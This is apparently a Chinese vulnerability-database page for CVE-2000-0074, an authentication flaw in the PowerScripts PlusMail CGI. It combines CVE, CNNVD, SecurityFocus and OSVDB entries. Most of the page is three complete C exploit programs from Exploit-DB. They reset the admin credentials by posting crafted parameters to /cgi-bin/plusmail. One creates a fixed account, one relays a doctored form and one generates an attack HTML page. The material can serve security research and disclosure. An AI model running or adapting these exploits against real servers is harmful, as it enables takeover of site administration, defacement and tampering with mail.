CVE-2000-0074
CVSS7.5
发布时间 :2000-01-11 00:00:00
修订时间 :2008-09-10 15:02:42
NMCOES    

[原文]PowerScripts PlusMail CGI program allows remote attackers to execute commands via a password file with improper permissions.


[CNNVD]PowerScripts PlusMail WebConsole加密问题漏洞(CNNVD-200001-031)

        PowerScripts PlusMail CGI程序存在漏洞。远程攻击者可以借助一含有不正确许可的密码文件执行命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0074
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0074
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200001-031
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

PowerScripts PlusMail WebConsole加密问题漏洞
高危 配置错误
2000-01-11 00:00:00 2005-10-20 00:00:00
远程  
        PowerScripts PlusMail CGI程序存在漏洞。远程攻击者可以借助一含有不正确许可的密码文件执行命令。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (20799)

PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (1) (EDBID:20799)
cgi remote
2000-01-11 Verified
0 Synnergy Networks
N/A [点击下载]
source: http://www.securityfocus.com/bid/2653/info

PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining mailing lists, mail aliases, and web sites. It is reportedly possible to change the administrative username and password without knowing the current one, by passing the proper arguments to the plusmail script. After this has been accomplished, the web console allows a range of potentially destructive activities including changing of e-mail aliases, mailing lists, web site editing, and various other privileged tasks. This can be accomplished by submitting the argument "new_login" with the value "reset password" to the plusmail script (typically /cgi-bin/plusmail). Other arguments the script expects are "username", "password" and "password1", where username equals the new login name, password and password1 contain matching passwords to set the new password to.

The specific affected versions have not been determined, and the developer cannot be located. 

/*
 * [Synnergy Networks http://www.synnergy.net]
 * 
 * Title:	plusbug.c - [remote plusmail exploit]
 * Author:	headflux (hf@synnergy.net)
 * Date:	01.10.2000
 * Description:	plusmail fails to check authenticity before creating new
 *		accounts
 *
 * [Synnergy Networks (c) 2000, http://www.synnergy.net]
 */

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
    char *expcgi = "GET /cgi-bin/plusmail?login=pluz&password=pluz&"
                   "password1=pluz&new_login=Login HTTP/1.0\n\n";

    struct hostent *hp;
    struct in_addr addr;
    struct sockaddr_in s;
    u_char buf[280];
    int p, i;
 
    if (argc < 1)
    {
        printf("usage: %s hostname\n", argv[0]);
        exit(1);
    } 

    hp = gethostbyname(argv[1]);
    if(!hp)
    {
        printf("bad hostname.\n");
        exit(1);
    }

    bcopy (hp->h_addr, &addr, sizeof (struct in_addr));
    p = socket (s.sin_family = 2, 1, IPPROTO_TCP);
    s.sin_port = htons(80);
    s.sin_addr.s_addr = inet_addr (inet_ntoa (addr));

    if(connect (p, &s, sizeof (s))!=0)
    {
        printf("error: unable to connect.\n");
  	return;
    }
    else
    {
        send(p, expcgi, strlen(expcgi), 0);
        alarm(5);
        read(p, buf, 255);
        close(p);
    }

    if (strstr(buf, "200 OK") && ! strstr(buf, "Invalid"))
        printf("account pluz/pluz created.\n");
    else
        printf("exploit failed.\n");

    return(0);
}
/*                    www.hack.co.za           [21 July]*/
		

- 漏洞信息 (20800)

PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (2) (EDBID:20800)
cgi remote
2000-01-11 Verified
0 missnglnk
N/A [点击下载]
source: http://www.securityfocus.com/bid/2653/info
 
PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining mailing lists, mail aliases, and web sites. It is reportedly possible to change the administrative username and password without knowing the current one, by passing the proper arguments to the plusmail script. After this has been accomplished, the web console allows a range of potentially destructive activities including changing of e-mail aliases, mailing lists, web site editing, and various other privileged tasks. This can be accomplished by submitting the argument "new_login" with the value "reset password" to the plusmail script (typically /cgi-bin/plusmail). Other arguments the script expects are "username", "password" and "password1", where username equals the new login name, password and password1 contain matching passwords to set the new password to.
 
The specific affected versions have not been determined, and the developer cannot be located. 

/*
 * plusmail cgi exploit 
   - missnglnk 
   greets: herf, ytcracker, mosthated, tino
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/param.h>

extern int      errno;

int
main(int argc, char **argv)
{
	int             argswitch, tport = 80, sockfd, plen, cltlen, lport = 4040;
	char           *target, tmpdata[32768], *password = "default",
	               *username = "jackdidntsetone", pdata[1024], *errcode,
	               *tmpline, *firstline, clntfd, origdata[32768], htmldata[32768];
	struct sockaddr_in rmt, srv, clt;
	struct hostent *he;
	unsigned long   ip;

	if (argc < 5) {
		printf("plusmail cgi exploit by missnglnk\n");
		printf("%s [-h hostname/ip ] [-p target port] [-u username] [-n newpassword] [-l optional local port]\n",
argv[0]);
		return -1;
	}

	while ((argswitch = getopt(argc, argv, "h:p:u:n:l:v")) != -1) {
		switch (argswitch) {
		case 'h':
			if (strlen(optarg) > MAXHOSTNAMELEN) {
				printf("ERROR: Target hostname too long.\n");
				return -1;
			}
			target = optarg;
			break;

		case 'p':
			tport = atoi(optarg);
			break;

		case 'n':
			if (strlen(optarg) > 8) {
				printf("Password length greater than 8 characters.\n");
				return -1;
			}
			password = optarg;
			break;

		case 'u':
			if (strlen(optarg) > 8) {
				printf("Username length greater than 8 characters.\n");
				return -1;
			}
			username = optarg;
			break;

		case 'l':
			lport = atoi(optarg);
			break;

		case '?':
		default:
			printf("plusmail cgi exploit by missnglnk\n");
			printf("%s [-h hostname/ip ] [-p target port] [-u username] [-n newpassword] [-l optional local
port]\n", argv[0]);
			return -1;
			break;
		}
	}

	argc -= optind;
	argv += optind;

	bzero(&rmt, sizeof(rmt));
	bzero(&srv, sizeof(srv));
	bzero(&clt, sizeof(clt));
	bzero(tmpdata, sizeof(tmpdata));
	cltlen = sizeof(clt);

	if ((he = gethostbyname(target)) != NULL) {
		ip = *(unsigned long *) he->h_addr;
	} else if ((ip = inet_addr(target)) == NULL) {
		perror("Error resolving target");
		return -1;
	}

	rmt.sin_family = AF_INET;
	rmt.sin_addr.s_addr = ip;
	rmt.sin_port = htons(tport);

	srv.sin_family = AF_INET;
	srv.sin_addr.s_addr = INADDR_ANY;
	srv.sin_port = htons(lport);

	if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
		perror("Error creating socket");
		return -1;
	}

	if (connect(sockfd, (struct sockaddr *) & rmt, sizeof(rmt)) < 0) {
		perror("Error connecting");
		return -1;
	}

	snprintf(pdata, sizeof(pdata), "username=%s&password=%s&password1=%s&new_login=missnglnk", username, password,
password);
	plen = strlen(pdata);

	snprintf(tmpdata, sizeof(tmpdata), "POST /cgi-bin/plusmail HTTP/1.0\n" \
		 "Referer: http://www.pure-security.net\n" \
		 "User-Agent: Mozilla/4.08 [en] (X11; I; SunOS 5.7 missnglnk)\n" \
		 "Host: %s\n" \
		 "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\n" \
		 "Accept-Encoding: gzip\n" \
		 "Accept-Language: en\n" \
		 "Accept-Charset: isp-8859-1,*,utf-8\n" \
		 "Content-type: application/x-www-form-urlencoded\n" \
		 "Content-length: %d\n" \
		 "\n%s\n", target, plen, pdata);

	if (write(sockfd, tmpdata, strlen(tmpdata)) < strlen(tmpdata)) {
		perror("Error writing data");
		return -1;
	}

	bzero(tmpdata, sizeof(tmpdata));
	while (read(sockfd, tmpdata, sizeof(tmpdata)) != 0) {
		strncpy(origdata, tmpdata, sizeof(origdata));
		firstline = strtok(tmpdata, "\n");
		bzero(tmpdata, sizeof(tmpdata));

		if ((errcode = strstr(firstline, "404")) != NULL) {
			printf("plusmail.cgi aint here buddy.\n");
			return -1;
		}

		for ((tmpline = strtok(origdata, "\n")); tmpline != NULL; (tmpline = strtok(NULL, "\n"))) {
			if ((errcode = strstr(tmpline, "<form action")) != NULL) {
//				sprintf(htmldata, "%s<form action = \"http://%s/cgi-bin/plusmail\" method = \"post\">\n",
htmldata, target);
				snprintf(htmldata, sizeof(htmldata), "%s<form action = \"http://%s/cgi-bin/plusmail\" method =
\"post\">\n", htmldata, target);
			} else {
//				sprintf(htmldata, "%s%s\n", htmldata, tmpline);
				snprintf(htmldata, sizeof(htmldata), "%s%s\n", htmldata, tmpline);
			}
		}
	}

	if (close(sockfd) < 0) {
		perror("Error closing socket");
		return -1;
	}

	strncat(htmldata, "\n<br><missnglnk>\0", sizeof(htmldata));

	if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
		perror("Error creating socket");
		return -1;
	}

	printf("waiting on port %d...", lport);

	if (bind(sockfd, (struct sockaddr *) & srv, sizeof(srv)) < 0) {
		perror("Error binding to socket");
		return -1;
	}

	if (listen(sockfd, 0) < 0) {
		perror("Error setting backlog");
		return -1;
	}

	if ((clntfd = accept(sockfd, (struct sockaddr *) & clt, &cltlen)) < 0) {
		perror("Error accepting connection");
		return -1;
	}

	printf("connection from %s:%d\n", inet_ntoa(clt.sin_addr), ntohs(clt.sin_port));

	if (!write(clntfd, htmldata, sizeof(htmldata))) {
		perror("Error writing data");
		return -1;
	}

	if (close(clntfd) < 0) {
		perror("Error closing socket");
		return -1;
	}

	printf("\n%s\n", htmldata);
	return 0;
}






		

- 漏洞信息 (20801)

PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (3) (EDBID:20801)
cgi remote
2000-01-20 Verified
0 ytcracker
N/A [点击下载]
source: http://www.securityfocus.com/bid/2653/info
  
PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining mailing lists, mail aliases, and web sites. It is reportedly possible to change the administrative username and password without knowing the current one, by passing the proper arguments to the plusmail script. After this has been accomplished, the web console allows a range of potentially destructive activities including changing of e-mail aliases, mailing lists, web site editing, and various other privileged tasks. This can be accomplished by submitting the argument "new_login" with the value "reset password" to the plusmail script (typically /cgi-bin/plusmail). Other arguments the script expects are "username", "password" and "password1", where username equals the new login name, password and password1 contain matching passwords to set the new password to.
  
The specific affected versions have not been determined, and the developer cannot be located. 

/*

[gH Security Advisory]

software affected:	PowerScripts PlusMail
versions affected:	All versions to current.
discussion:		Read report below.

*/

/*

[gH-plus.c]

title:		[gH plusmail vulnerability]
date:		01.20.2000
author:		ytcracker of gH [phed@felons.org]
comments:	plusmail is an extremely popular cgi-based administration
		tool that allows you to take control of your website
		with a graphical control panel interface.  the password
		file, however, is set with permissions rw enabled,
		therefore granting the authority to change the password
		whenever's clever.
		the following code will detect the vulnerability and
		generate the required html to exploit.
shouts:		seven one nine.  all of gH.  www.mp3.com/category5.
		herf@ghettophreaks.org for finding vulnerability.

[Advisory Information]

written by:	mosthated of gH [most@pure-security.net]
vulnerable:	So far, any environment running Plusmail.
report:		Noticed plusmail running on multiple operating systems.
		The vulnerability lies in the web based tool, which
		now that is easily exploited, gives you "ADVANCED CONTROL"
		of a target website.  Below is the code by ytcracker of gH,
		which demonstrates how easy it is to generate the html code
		which is executed by your web browser to compromise the
		target host.  We have noticed this PlusMail program is widely
		used, but have yet to succeed in finding the main site for
		PlusMail to acknowledge the developers of the remote 
		vulnerability.

		Most likely this will be ripped out during the online trading,
		because of script kids not likely this factual addition, but 
		never the less, it will be expressed.  This exploit was written 
		to acknowledge security weaknesses, but in no way promotes web 
		page defacments.  If you further use this program to gain access 
		to anything not normally accessable by yourself, meaning you 
		script kids, then you are subject to be prosecuted and even get 
		10 years in prison.  Is it honestly worth it to compile this program 
		and randomly ./hack sites and deface them with this half way 
		automatted program to put your nick & group on it?  
		The answer is NO.  gh/global hell.. Heard of us?? Seen us on TV??
		Read about us?? Most likely..	We've changed and gained knowledge 
		from the experience....Been there done that..  The world didn't
		believe that a group like this could completely go legit, the IT
		professionals figured we would retaliate against the fbi and the
		world was scared by misleading media articles about how we are
		terrorist and destructive teens.  I ask the world now, who is helping
		who?  Did the media find this vulnerability?  Did the stereotypist
		who label us as "cyber gang members" find this vulnerability and allow
		networks around the world to be patched before so called "destructive
		hackers" gained access to them.  Answer yet again, NO, we did, not you
		who falsely claim to be helping with security.  Your defacements don't
		help anything, we thought it did before as well, now we realized that
		it does nothing positive.  You stereotypists know nothing about gH, yet
		can write articles, you're wrong.  You people think so much that you know
		so much about hackers.  You know nothing, what you think you know, is
		wrong.  What you don't know about us, the information is right under
		your nose, yet you still can't put your finger on it.  Their are 2 sides
		to the so called "hacking scene", you people should realize there will
		always be a good and a bad side to most matters.  Don't exploit the
		fact that you don't know anything about the whole situation, just face 
		the real fact, our knowledge could be a great help to all, why not
		accept us as normal people, not untrue off the wall assumptions.
		If you use programs like this to deface sites, think before you use
		this one, because we have been through the childish fights online
		and expressed our feelings, we are still where we started, from square
		one and would not have gone any farther, until we realized that what we
		were doing was stupid, pathetic, futureless and illegal.  Choose
		your path wisely, either stop the script kiddie bullshit or get 
		your door kicked in, you decide.
fix:		Move/rename the PlusMail directory as a temporary fix.

*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <fcntl.h>
#include <strings.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
	int sock;
        unsigned long vulnip;

	struct in_addr addr;
	struct sockaddr_in sin;
	struct hostent *he;
                                                                     	
        char *detect;
	char buffer[1024];
	char plusvuln[]="GET /cgi-bin/plusmail HTTP/1.0\n\n";
	char htmI[]="<html><head><title>[gH plusmail exploit]</title></head><form action=\"http://";
	char htmII[]="/cgi-bin/plusmail\" method=\"post\"><p>username: <input type=\"text\" name=\"username\"><br>password:
<input type=\"password\" name=\"password\"><br>retype password: <input type=\"password\" name=\"password1\"></p><p><input
type=\"submit\" name=\"new_login\" value=\"reset password\"></p></form><p><a href=\"http://pure-security.net\">Pure Security
Networks</a></p></body></html>";

        FILE *html;

	printf("\n [gH plusmail exploit] [ytcracker] [phed@felons.org]\n");

	if(argc<2)
	{
		printf(" usage: %s [vulnerable website]\n\n",argv[0]);
                exit(0);
	}

	if ((he=gethostbyname(argv[1])) == NULL)
	{
		herror("gethostbyname");
		exit(0);
	}

	vulnip=inet_addr(argv[1]);
        vulnip=ntohl(vulnip);

	sock=socket(AF_INET, SOCK_STREAM, 0);
	bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
	sin.sin_family=AF_INET;
	sin.sin_port=htons(80);

	if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
	{  
		perror("connect");
	}

	send(sock, plusvuln,strlen(plusvuln),0);
	recv(sock, buffer, sizeof(buffer),0);
	detect = strstr(buffer,"404");
	close(sock);
     
	if( detect != NULL)
        {
		printf(" vulnerabilty not detected.\n");
                exit(0);
        }
	else
		printf(" vulnerability detected.  generating html...\n");
	
	html=fopen("plus.html","w+b");
	fprintf(html,"%s",htmI);
	fprintf(html,"%s",argv[1]);
	fprintf(html,"%s",htmII);
        fclose(html);

	printf(" spawning lynx...\n");

        system("lynx plus.html");
	return 0;
}


		

- 漏洞信息

139
PlusMail plusmail CGI Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified, Uncoordinated Disclosure

- 漏洞描述

- 时间线

2000-01-11 Unknow
2000-01-11 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

PowerScripts PlusMail WebConsole Poor Authentication Vulnerability
Configuration Error 2653
Yes No
2000-01-11 12:00:00 2009-07-11 06:06:00
Posted to BugTraq on January 11th, 2000 by YT Cracker < phed@felons.org >

- 受影响的程序版本

PowerScripts PlusMail WebConsole 1.0
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9

- 漏洞讨论

PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining mailing lists, mail aliases, and web sites. It is reportedly possible to change the administrative username and password without knowing the current one, by passing the proper arguments to the plusmail script. After this has been accomplished, the web console allows a range of potentially destructive activities including changing of e-mail aliases, mailing lists, web site editing, and various other privileged tasks. This can be accomplished by submitting the argument "new_login" with the value "reset password" to the plusmail script (typically /cgi-bin/plusmail). Other arguments the script expects are "username", "password" and "password1", where username equals the new login name, password and password1 contain matching passwords to set the new password to.

The specific affected versions have not been determined, and the developer cannot be located.

- 漏洞利用

x

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站